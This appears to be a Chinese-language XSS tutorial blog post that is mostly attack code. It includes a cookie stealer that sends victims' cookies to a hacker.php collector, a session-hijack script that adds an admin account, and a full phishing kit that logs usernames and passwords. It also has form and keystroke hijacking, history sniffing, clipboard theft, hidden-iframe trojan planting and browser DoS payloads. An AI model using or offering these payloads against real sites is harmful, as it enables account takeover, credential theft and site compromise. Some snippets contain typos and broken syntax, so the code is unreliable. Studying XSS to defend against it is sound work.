一、跨站获取cookie
1,hacker端(hacker.php)的程序如下:
<?php
$cookie=$_GET['cookie'];
$file=fopen("cookie.txt","a");
fwrite($file,$cookie);
fclose($file)
?>
2,受害者端(victim.php)的程序如下:
<html>
<head>
<title>xss跨站原理复现</title>
</head>
<body>
<form action="" method="get">
<input type="text" name="xss_input">
<input type="submit" value="提交">
</form>
<?php
$xss=@$_GET['xss_input'];
echo '你输入的字符为<br>'.$xss;
?>
</body>
</html>
3,hacker发给victim的payload语句如下:
http://localhost/victim.php?xss_input=<script>document.location="http://localhost/hacker.php?cookie="+document.cookie</script>
ps:第一次用的事件不是document.location,选择的是window.open事件,But,没有成功。更换浏览器也不照。
4,当victim点击hacker发送的链接后,Victim主机的cookie就被写入到hacker的cookie.txt文档中了,cookie信息也就因此丢失了,那么hacker久可以利用这个cookie信息针对victim做bulabula....
二、会话劫持
xss会话劫持就是***者利用xss劫持了用户的会话去执行某些恶意操作。
1,XSS实现权限提升
前提一:抓取到被***者添加管理员账号信息时的请求信息,包括请求的URL地址和POST的数据。
前提二:拥有被***主机中的cookie信息
xss shellcode如下:
var request=false;
if(window.XMLHttpRequest) {
request=new XMLHttpRequest();
if(request.overrideMimeType) {
request.oveerideMimeType('text/xml');
}
}
else if(window.ActiveXObject){
var versions=['Microsoft.XMLHTTP','MSXML.XMLHTTP','Microsoft.XMLHTTP','Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0',
'Msxml2.XMLHTTP.5.0','Msxml2.XMLHTTP.4.0','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP'];
for(var i=0;i<version.length;i++){
try{
request=new ActiveXObject(versions);
} catch(e) {}
}}
xmlhttp=request;
add_admin();
function add_admin(){
var url="/admin/AdminUser/adminUser_Add.asp"; //请求地址
var params="UserName=xss123&password1=123456&password2=123456Purview=%B9%DC%C0%ED%D4%B1&Submit=%CC%E1%BD%BB"; //提交的数据。这里的user和password均是要添加的信息
xmlhttp.open("POST",url,true);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length",params.length);
xmlhttp.setRequestHeader("Connection","close";)
xmlhttp.send(params);
}
三、XSS钓鱼
思路:
针对正常的页面(normal.php)进行伪造钓鱼页面(evil.php)--->创建收集受害者信息的脚步文件(get.php)--->寻找存在漏洞的网站(bug.php)--->根据漏洞情况制作框架文件(xss.js)链接(exploit),发送给受害者--->等待受害者点击,获取信息
具体步骤&代码如下:
1,正常的页面如下:
<form method="post" action="http://www.baidu.com/">//简单点,点击登录直接扔给百度
<input type="text" name="username" value="Tason" /><br />
<input type="password" name="password" value="P@ss" /><br />
<input type="submit" name="logon" value="Submit" />
</form>
2,钓鱼页面,可以直接从真实网站复制过来。
伪造的页面如下:
<form method="post" action="http://localhost/phishing/get.php"> //get.php为hacker端接收s受害者信息的页面
<input type="text" name="username" value="Tason" /><br/>
<input type="password" name="password" value="P@ss" /><br />
<input type="submit" name="logon" value="Submit"/>
</form>
3,记录信息的脚本文件 get.php 内容如下:
<?php
$data=fopen("logfile.txt","a+");//注:logfile文件必须事先创建好
$login=$_POST['username'];
$pass=$_POST['password'];
fwrite($data,"Username:$login\n");
fwrite($data,"Password:$pass\n");
fclose($data);
Header("location:"); //信息收集完毕跳转到正常页面
?>
4,存在漏洞的网站bug.php代码内容如下:
<?php
$s1=@$_GET['s'];
echo "<br>";
echo $s1;
?>
5,xss.js文件的作用是创建一个iframe框架覆盖目标页面,再加载远程域伪造的钓鱼页面,内容如下:
document.body.innerHTML=(
'<div style="position:absolute; top:0px; left:0px; width:100%; height:100%;">'+
'<iframe src=http://localhost/phishing/evil.php width=100% height=100%>'+
'</iframe></div>'
);
6,xss钓鱼exploit如下:
http://localhost/phishing/bug.php?s=<script src=http://localhost/phishing/xss.js></script>//bug.php为存在漏洞的网站
7,等待收网
xss钓鱼的方式:
1,xss重定向钓鱼
即把当前页面重定向到钓鱼网站上:
http://localhost/phishing/bug.php?s=<script src=http://localhost/phishing/xss.js></script>
2,html注入式钓鱼
即把钓鱼网站的页面直接加载到链接中:
http://localhost/phishing/bug.php?s=
<html><head><title>login</title></head>
<body><form method="post" action="http://localhost/phishing/get.php">
<input type="text" name="username" value="Tason" /><br/>
<input type="password" name="password" value="P@ss" /><br />
<input type="submit" name="logon" value="Submit"/>
</form></body></html>
3,XSS跨框架钓鱼
即通过<iframe>标签嵌入远程域的页面实施钓鱼
http://localhost/phishing/bug.php?s=<iframe src=http://localhost/phishing/xss.js></iframe>
4,flash钓鱼
***者把精心构造的flash文件上传到远程服务器,然后在目标网站上使用<object><embed>标签去引用flash即可
Tips:
1,劫持链接的onclick事件
for (i=0;i<document.links.length;i++){
document.links.οnclick=hijack;
}
2,监听键盘的onkeydown事件
document.οnkeydοwn=function(e){
if(!e) e=window.event;
try{hijack();} catch(ex){}
}
3,劫持表单的输入框
document.οnkeyup=function(){
document.forms['PassFormlogin'].οnsubmit=function(){
pwd=this.PassInputUsername0.value + '|' + this.PassInputPassword0.value;
log(escape(pwd));
}}
四,xss history hack
利用css能定义和控制链接样式的特性,能够获取用户浏览器的某些历史记录,甚至是在搜索引擎输入的查询字符
1,链接样式和getComputedStyle()
css中4个伪类用来定义链接的样式,分别是:
a:link未访问的
a:visited 已访问的
a:active激活的,被选择的链接
a:hover光标悬停在其上的链接
新建HTML样例:
<style type="text/css">
a:link{color:blue}
a:visited{color:red}
a:hover{color:yellow}
</style>
<a href="http://www.google.com" id="x">google</a></br>
<a href="http://www.baidu.com" id="x">baidu</a></br>
<a href="http://weibo.com" id="x">weibo</a></br>
<a href="http://qq.com" id="x">qq</a></br>
<a href="http://www.163.com" id="x">163</a>
利用getComputedStyle()来实现侦查某一个人是否访问过一个任意的url。
2,JavaScript/CSS history hack
<html>
<body>
<H3>Visited</H3>
<ul id="visited"></ul>
<H3>Not Visited</H3>
<ul id="notvisited"></ul>
<script>
var websites=[
"http://www.baidu.com/",
"http://www.zhibo8.cc/",
"http://51cto.com/",
"http://www.sina.com/",
"http://weibo.com/",
"http://www.playsec.com/",
];
for(var i=0;i<websites.length;i++){
var link=document.createElement("a");
link.id="id"+i;
link.href=websites;
link.innerHTML=websites;
document.write('<style>');
document.write('#id' +i + ":visited {color: #FF0000;}");
document.write('</style>');
document.body.appendChild(link);
var color=document.defaultView.getComputedStyle(link,null).getPropertyValue("color");
document.body.removeChild(link);
if (color == "rgb(255,0,0)"){
var item=document.createElement('li');
item.appendChild(link);
document.getElementById('visited').appendChild(item);
} else{
var item =document.createElement('li');
item.appendChild(link);
document.getElementById('notvisited').appendChild(item);
}
}
</script>
</body>
</html>
3,窃取搜索查询
目的是为了收集用户感兴趣的话题,利用这些信息实施网络钓鱼、***
五,客户端信息探测
1,JavaScript实现端口扫描
ps:个人觉得可以用其他更好的扫描工具,比如nmap
2,截获剪切板内容
通过嵌入网页的JavaScript代码劫持客户端的剪切板,从而获取重要信息
JavaScript中主要使用window.clipboardData对象处理剪切板的内容,有以下三种方法:
clearData(sDataFormat) //删除剪贴板中指定格式的数据
getData(sDataFormat) //从剪贴板获取指定格式的数据
setData(sDataFormat,sData) //给剪贴板赋予指定格式的数据
poc如下:
<form id="test" action="test.php" method="post">
<div id="someData">
<textarea rows="4" cols="40" name="test">
</textarea>
</div>
<input type="button" value="复制到剪贴板">
<input type="button" value="查看剪贴板内容" οnclick="readClipboard()">
<input type="button" value="清除">
</form>
<script>
function readClipboard(){
alert(window.clipboardData.getData('Text'));
}
function setClipboard(){
var t=document.getElementById("someData").innerText;
window.clipboardData.setData('text',t);
}
</script>
ps:IE浏览器测试成功
3,获取客户端IP地址
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=gb2312">
<title>JavaScript获取客户端IP</title>
</head>
<body>
function GetLocalIPAddress()
{
var obj = null;
var rslt = "";
try{
obj = new ActiveXObject("rcbdyctl.Setting");
rslt =obj.GetIPAddress;
obj = null;
}
catch(e){}
return rslt;
}
document.write("你的IP是: "+ GetLocalIPAdress());
</script>
</body>
</html>
六,网页挂马
实现方式一般都是通过篡改网页来实现,例如在xss***中使用<iframe>标签,代码如下:
<iframe src=http://localhost/trojan.html width=0 height=0></iframe>
还可以利用JavaScript脚本动态创建窗口并调用网页***
<script>
document.write("<iframe src=http://localhost/trojan.html width=0 height=0></iframe>")
</script>
七,DOS和DDOS
通过注入而已的JavaScript脚本代码,引起dos***,目标是受害人的浏览器,代码如下
<script>for (;;) alert("xss");</script>
保存为html文件发给客户或者通过漏洞调用
http://localhost/victiom.php?s=<script>for(;;)alert("xss");</script>
ps: <meta http-equiv="refresh" content="0"> 会强迫受害者不断的刷新当前页面
八,xss virus/worm
xss virus/worm类似于个人计算机平台上的病毒程序,有潜伏、后门的特性,可以用于盗号、窃取用户隐私信息,主要在客户端执行恶意***,类似蠕虫般具有自我复制能力的***形态。
例如:samy xss worm***事件。当时samy在自己的空间的个人简介处植入一段JavaScript代码,每个查看他简介的人会在不知觉间执行这段代码,加samy为好友,然后蠕虫打开受害者的个人简介,写入恶意JavaScript代码,进而任何查看该受害者个人简介的人也会被感染。
最后:有些情况没有测试案例,后续在学习的过程中会继续补充。
Tips:学习&分享